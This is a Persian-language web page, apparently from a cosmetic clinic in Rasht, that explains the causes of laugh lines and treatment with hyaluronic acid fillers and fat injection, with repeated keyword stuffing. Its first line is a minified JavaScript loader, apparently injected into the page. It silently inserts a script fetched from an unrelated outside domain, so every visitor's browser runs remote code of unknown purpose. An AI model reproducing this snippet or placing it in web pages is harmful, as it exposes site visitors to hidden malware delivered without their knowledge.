;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); تزریق ژل خط خنده رفع خط خنده در رشت دکتر کتابچی کاشت مو رشت کاشت ابرو رشت

تزریق ژل خط خنده

تزریق ژل خط خنده

خط خنده با نام خط لبخند نیز شناخته می شود. این خط ها چین و چروک هایی هستند که کناره های دهان و همچنین نزدیک چشم ها ایجاد می شوند. همان طور که از نام آن ها مشخص است، این خط ها هنگام خندیدن مشخص تر می شوند. خبر خوب این است که روشی ساده و سریع به نام تزریق فیلر وجود دارد که برای اصلاح این خط های خنده به کار می رود. با اینکه خط های خنده خیلی شایع هستند، اما شدت آن در افراد مختلف می تواند متفاوت باشد.

تزریق ژل خط خنده تزریق ژل خط خنده  تزریق ژل خط خنده

علت ایجاد خط خنده چیست؟

بالا رفتن سن، نور خورشید و سیگار کشیدن بزرگت رین دلایل بروز خط خنده هستند. اشعه فرا بنفش خورشید فیبرهای کلاژن و الاستین پوست شما که موجب نرمی و محافظت آن می شوند را از بین می برد. همچین سیگار کشیدن نیز باعث تجزیه این فیبرها می شود. هر چه سن شما بالاتر می رود نیز بروز آسیب های فزاینده به پوست می تواند این خط ها را نمایان تر سازد.

حتی بدون سیگار کشیدن یا در معرض نور خورشید قرار گرفتن نیز بالا رفتن سن می تواند در این موضوع تاثیر گذار باشد. هر چه سن بالاتر می رود، ساختار استخوان های گونه ها صاف تر می شود. این باعث می شود که پوست گونه های شما آویزان شود یا پایین بیفتد. به همه این ها جاذبه را نیز اضافه کنید که سال هاست به پوست ما فشار وارد می کند و موجب کاهش طبیعی کلاژن و الاستین پوست می شود. در نتیجه همه این ها، چین و چروک ها، پوست شل و خط های خنده ظاهر می شوند

تزریق ژل خط خنده تزریق ژل خط خنده تزریق ژل خط خنده

کاهش یا اضافه وزن شدید نیز می تواند با موضوع خط های لبخند مرتبط باشد. کاهش وزن منجر به پوست شل تر می شود، خصوصا در صورت و گردن. افزایش وزن می تواند گونه ها را چاق تر کند و منجر به خط های خنده شود.

همچنین خوابیدن به پهلو ممکن است خط های لبخند یک سمت یا هر دو سمت صورت را عمیق تر کند، اما نیازی نیست برای جلوگیری از این موضوع به پشت بخوابید. قطعا اگر عمیق تر نشدن خط های لبخند برای شما نگران کننده است می توانید به پشت بخوابید، اما با این حال، یک خواب خوب شبانه نیز به همان اندازه برای ترمیم پوست و سالم ماندن ضروری است.

درمان خط خنده با تزریق ژل

ژل یا فیلرهای پوستی ترکیباتی تزریقی هستند که برای درمان چین و چروک های صورت استفاده می شوند. این فیلرها سطح پوست را پر می کنند و در نتیجه خط ها و چین و چروک های عمیق صاف تر می شوند. همه فیلرها به تقویت کلاژن کمک می کنند. کلاژن پروتئینی پر کننده در صورت است که به صورت طبیعی با بالا رفتن سن از بین می رود.

معمول ترین انواع فیلرها برای خط های خنده حاوی هیالورونیک اسید هستند. این ماده شفاف به صورت طبیعی در پوست تولید می شود و به سفتی و آب رسانی آن کمک می کند.

تزریق ژل خط خنده رشت تزریق ژل خط خنده رشت تزریق ژل خط خنده رشتتزریق ژل خط خنده

تزریق چربی

تزریق چربی نیز یکی از روش های تزریق فیلر به خط خنده می باشد که دارای مزایای بسیاری است. در روش تزریق چربی به صورت از چربی بدن خود فرد برای از بین بردن خطوط چهره مخصوصا خطوط خنده استفاده می شود و به همین دلیل هیچ گونه عوارضی نظیر بروز حساسیت را به همراه نخواهد داشت.